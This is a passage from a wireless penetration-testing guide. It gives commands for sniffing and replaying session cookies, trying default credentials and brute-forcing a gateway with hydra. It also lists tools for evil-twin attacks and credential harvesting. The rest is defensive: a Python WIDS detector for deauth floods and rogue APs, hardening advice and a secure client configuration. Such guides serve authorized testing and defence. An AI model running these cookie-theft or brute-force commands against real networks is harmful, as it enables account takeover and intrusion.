# If arp-scan shows other client IPs → isolation is NOT enforced
curl -s http://<OTHER_CLIENT_IP>
# Port scan the gateway/AP
nmap -sV -p 22,23,80,443,8080,8443 <GATEWAY_IP>
# Full subnet sweep
nmap -sn 192.168.X.0/24
14.2 Session Cookie Hijacking
# From a decrypted capture, extract session cookies
tshark -r ~/wifi/captures/target-01-dec.cap \
-Y "http.cookie" \
-T fields \
-e ip.src -e http.host -e http.cookie \
2>/dev/null
# Or from live capture on an open network
tshark -i wlan2 \
-Y "http.cookie" \
-T fields \
-e ip.src -e http.host -e http.cookie \
2>/dev/null
# Replay cookie with curl
curl -H "Cookie: session=<STOLEN_COOKIE>" http://<TARGET_IP>/
14.3 Gateway/AP Admin Panel Access
# Identify the AP admin interface
nmap -sV -p 80,443,8080,8443 <GATEWAY_IP>
# Test default credentials
curl -s -o /dev/null -w "%{http_code}" \
http://<GATEWAY_IP>/ \
-u admin:admin
# Common default credentials to try:
# admin:admin, admin:password, admin:(empty)
# admin:1234, root:root, admin:admin123
# (check vendor-specific defaults based on MAC OUI)
# Lightweight credential brute-force against HTTP Basic Auth
hydra -l admin -P /usr/share/wordlists/fasttrack.txt \
http-get://<GATEWAY_IP>/ -t 4 -V
15. Detection & Defense (WIDS)
15.1 Wireless Intrusion Detection
A WIDS monitors RF for anomalous 802.11 behavior:
| Alert Type | Triggered By | Attacker Action |
|---|---|---|
| Deauth flood | Spike in type-0xC mgmt frames | Deauth attack, Evil Twin prep |
| Rogue AP | Unknown BSSID with known SSID | Evil Twin |
| PMKID harvesting | Association flood from single MAC | hcxdumptool aggressive mode |
| Beacon flood | MDK4 beacon flooding | DoS/confusion |
| EAP anomaly | Identity leakage, method enumeration | Enterprise recon |
| MFP violation | Unprotected mgmt frames to MFP-capable clients | Deauth bypass attempt |
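Two of the table rows (deauth flood and rogue AP with a known SSID) implemented over a constructed tshark field export, as an added example rather than code from this guide or from any WIDS product. The field order of the input lines and the threshold of 20 deauthentication frames in 10 s are assumptions.

```python
"""Two rules from the WIDS alert table above, run over tshark-style frame records.

Added example, not code from the original guide or any WIDS product. Input lines
are assumed to look like: tshark -T fields -e frame.time_epoch -e wlan.fc.type_subtype
-e wlan.sa -e wlan.bssid -e wlan.ssid (tab-separated). The sample is constructed.
"""
from collections import defaultdict, deque

BEACON = 0x08   # management subtype 8
DEAUTH = 0x0C   # management subtype 12, the "type-0xC" row of the table

def parse_records(text):
    """Tab-separated tshark field lines -> list of dicts (MACs lower-cased)."""
    records = []
    for line in text.strip().splitlines():
        f = (line.split("\t") + [""] * 5)[:5]
        records.append({"t": float(f[0]), "subtype": int(f[1], 0),  # tshark prints 0x000c
                        "sa": f[2].lower(), "bssid": f[3].lower(), "ssid": f[4]})
    return records

class Wids:
    def __init__(self, inventory, window=10.0, deauth_threshold=20):
        # inventory: {ssid: {authorized bssid, ...}} from the site survey
        self.inventory = {s: {b.lower() for b in bs} for s, bs in inventory.items()}
        self.window = window
        self.threshold = deauth_threshold
        self._deauth_times = defaultdict(deque)   # apparent transmitter -> timestamps
        self._flagged_sources = set()
        self._flagged_rogues = set()

    def process(self, rec):
        """Return the alerts raised by one frame record (usually none)."""
        alerts = []
        if rec["subtype"] == DEAUTH:
            # Keyed on the apparent transmitter: an attacker spoofs the AP or client
            # address, so the alert names the address being impersonated.
            q = self._deauth_times[rec["sa"]]
            q.append(rec["t"])
            while q and rec["t"] - q[0] > self.window:   # sliding window
                q.popleft()
            if len(q) >= self.threshold and rec["sa"] not in self._flagged_sources:
                self._flagged_sources.add(rec["sa"])
                alerts.append(f"DEAUTH_FLOOD apparent_src={rec['sa']} "
                              f"count={len(q)} window={self.window:g}s")
        elif rec["subtype"] == BEACON and rec["ssid"] in self.inventory:
            # A known SSID advertised by a BSSID that is not in the inventory
            if (rec["bssid"] not in self.inventory[rec["ssid"]]
                    and rec["bssid"] not in self._flagged_rogues):
                self._flagged_rogues.add(rec["bssid"])
                alerts.append(f"ROGUE_AP ssid={rec['ssid']} bssid={rec['bssid']}")
        return alerts

    def run(self, records):
        return [a for r in sorted(records, key=lambda r: r["t"]) for a in self.process(r)]

def run_detection(text, inventory):
    """Parse and evaluate a whole export; returns the list of alert strings."""
    return Wids(inventory).run(parse_records(text))

# Constructed sample: a legitimate beacon, a 25-frame deauth burst spoofing the
# real AP's address, a beacon for an unrelated SSID, then an Evil Twin beacon.
INVENTORY = {"CORP_WIFI": {"aa:bb:cc:00:00:01"}}
_lines = ["1700000000.000\t0x0008\taa:bb:cc:00:00:01\taa:bb:cc:00:00:01\tCORP_WIFI"]
_lines += [f"{1700000001 + i * 0.2:.3f}\t0x000c\taa:bb:cc:00:00:01\taa:bb:cc:00:00:01\t"
           for i in range(25)]
_lines += ["1700000008.000\t0x0008\t11:22:33:44:55:66\t11:22:33:44:55:66\tGuest",
           "1700000009.000\t0x0008\tf0:9f:c2:00:aa:01\tf0:9f:c2:00:aa:01\tCORP_WIFI"]
SAMPLE_EXPORT = "\n".join(_lines)

if __name__ == "__main__":
    for alert in run_detection(SAMPLE_EXPORT, INVENTORY):
        print(alert)
```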
15.2 Nzyme WIDS
Access the Nzyme web interface:
http://127.0.0.1:22900/
Default credentials: admin / (configured at setup)
Navigation:
- Dashboard → overview of monitored networks and recent alerts
- Alerts → chronological list of detected anomalies with source MAC
- Networks → AP inventory
- Clients → observed client list
- Dot11 Frames → raw frame statistics per type
15.3 Hardening Recommendations
WPA2-Personal networks:
- Use WPA3-SAE if all devices support it
- Passphrase: 20+ random characters (avoid dictionary words)
- Enable 802.11w (MFP) — blocks deauthentication attacks
- Disable WPS — eliminates PIN brute-force and Pixie Dust
- Isolate clients (AP isolation) — prevents lateral movement
- Segment with VLANs: corporate / IoT / guest
- Monitor with WIDS
WPA2/3-Enterprise networks:
- Force server certificate validation on all clients (CA pinning)
- Prefer EAP-TLS over PEAP/EAP-TTLS — eliminates password-based attacks
- Enable 802.11w (MFP) — mandatory on WPA3
- Disable weak EAP methods: EAP-MD5, LEAP, EAP-FAST without PAC
- Restrict to one EAP method (minimize attack surface)
- Deploy WIDS with Rogue AP detection
- Use NAC to enforce client posture
- Rotate RADIUS certificates regularly
- Monitor for EAP identity leakage — consider anonymous outer identity
Secure wpa_supplicant client configuration (Enterprise):
network={
    ssid="CORP_WIFI"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="DOMAIN\username"
    password="strongpassword"
    # CRITICAL: ca_cert enforces server cert validation; without it any RADIUS server is trusted
    ca_cert="/etc/ssl/certs/corp-ca.pem"
    phase1="peaplabel=0"
    phase2="auth=MSCHAPV2"
    # Lock to the specific RADIUS server name — prevents a Rogue AP holding any other cert from the same CA
    domain_match="radius01.corp.local"
    # subject_match="/CN=radius01.corp.local" is the older form, deprecated in current wpa_supplicant
    # Or use altsubject_match for SAN fields:
    # altsubject_match="DNS:radius01.corp.local"
}
16. Tool Reference
Core Aircrack-ng Suite
| Tool | Purpose | Key Flags |
|---|---|---|
| airmon-ng | Monitor mode management | start wlan0, stop wlan0mon, check kill |
| airodump-ng | Passive capture & scan | -c <ch>, --bssid, -w, --band abg, --wps, --manufacturer |
| aireplay-ng | Frame injection | -0 deauth, -1 fake auth, --arpreplay |
| aircrack-ng | WEP/WPA crack | -w <wordlist>, handshake validation |
| airdecap-ng | Traffic decryption | -e <ssid>, -p <pass>, -w <wep_key> |
| besside-ng | Automated WEP crack | -c <ch>, -b <bssid> |
hcxtools Suite (PMKID / Modern WPA)
| Tool | Purpose | Key Usage |
|---|---|---|
| hcxdumptool | Capture PMKID + handshakes | -i wlan0mon, --enable_status=3, --filterlist_ap |
| hcxpcapngtool | Convert pcapng → hash | -o hash.hc22000, --info=stdout |
| hcxhash2cap | Convert hccapx → pcap | --hccapx=file.hccapx -c out.pcap |
| hcxhashtool | Hash manipulation / filtering | --info |
Rogue AP / Evil Twin
| Tool | Purpose | Notes |
|---|---|---|
| wifiphisher | Automated Evil Twin + Evil Portal | Best for PSK phishing; KARMA built-in |
| fluxion | Evil Twin + portal with handshake verification | Verifies password before showing success |
| hostapd-mana | Rogue AP, PSK capture, KARMA | Extensible, scriptable |
| eaphammer | Enterprise Evil Twin (EAP cred harvest) | Captive portal, hostile portal, cert wizard |
| berate_ap | Advanced Rogue AP for relay attacks | Integrates with wpa_sycophant |
| wpa_sycophant | MSCHAPv2 relay | Requires berate_ap as front-end |
Enterprise Tools
| Tool | Purpose | Notes |
|---|---|---|
| air-hammer | EAP brute-force / password spray | Online; slow; targeted |
| EAP_buster | EAP method enumeration | Reveals supported auth types |
| asleap | LEAP/MSCHAPv2 crack | Offline hash cracker |
Analysis
| Tool | Purpose | Notes |
|---|---|---|
| wireshark | GUI packet analysis + decryption | Full 802.11 + TLS decode |
| tshark | CLI packet analysis | Scriptable, batch processing |
| wifi_db | Capture aggregation DB | SQLite, good for large engagements |
| macchanger | MAC address manipulation | -r random, -m specific, -p restore |
| arp-scan | Local network discovery | -l local range, -I interface |
hashcat Mode Reference
22000 WPA-PBKDF2-PMKID+EAPOL ← CURRENT STANDARD (replaces 2500/16800)
22001 WPA-PMK-PMKID+EAPOL
5500 NetNTLMv1 / MSCHAPv2 ← Enterprise EAP captures
5600 NetNTLMv2 ← Hostile portal (Responder)
1000 NTLM ← Pass-the-hash scenarios
Attack → Protocol Matrix
| Protocol | Passive Sniff | Handshake | PMKID | Online BF | Rogue AP | Relay |
|---|---|---|---|---|---|---|
| OPN | YES | n/a | n/a | n/a | YES | n/a |
| OWE | NO* | n/a | n/a | n/a | YES | n/a |
| WEP | YES | n/a | n/a | n/a | NO | n/a |
| WPA2-PSK | YES† | YES | YES | NO | YES | n/a |
| WPA3-SAE | NO | NO | NO | YES | YES‡ | n/a |
| WPA2-Enterprise | YES§ | n/a | n/a | YES | YES | YES |
| WPA3-Enterprise | YES§ | n/a | n/a | NO | YES¶ | YES |
* OWE encrypts per-client but AP is unauthenticated → Evil Twin captures plaintext
† Requires client association (handshake) or PMKID (clientless)
‡ WPA3 transition mode only; full WPA3 SAE rogue AP → online brute-force only
§ EAP identity and TLS cert visible; inner credentials only if client doesn't verify cert
¶ Requires stolen real certificate for cert-verifying clients
Last updated: February 2026 — For use in authorized assessments and controlled lab environments only.
Sources: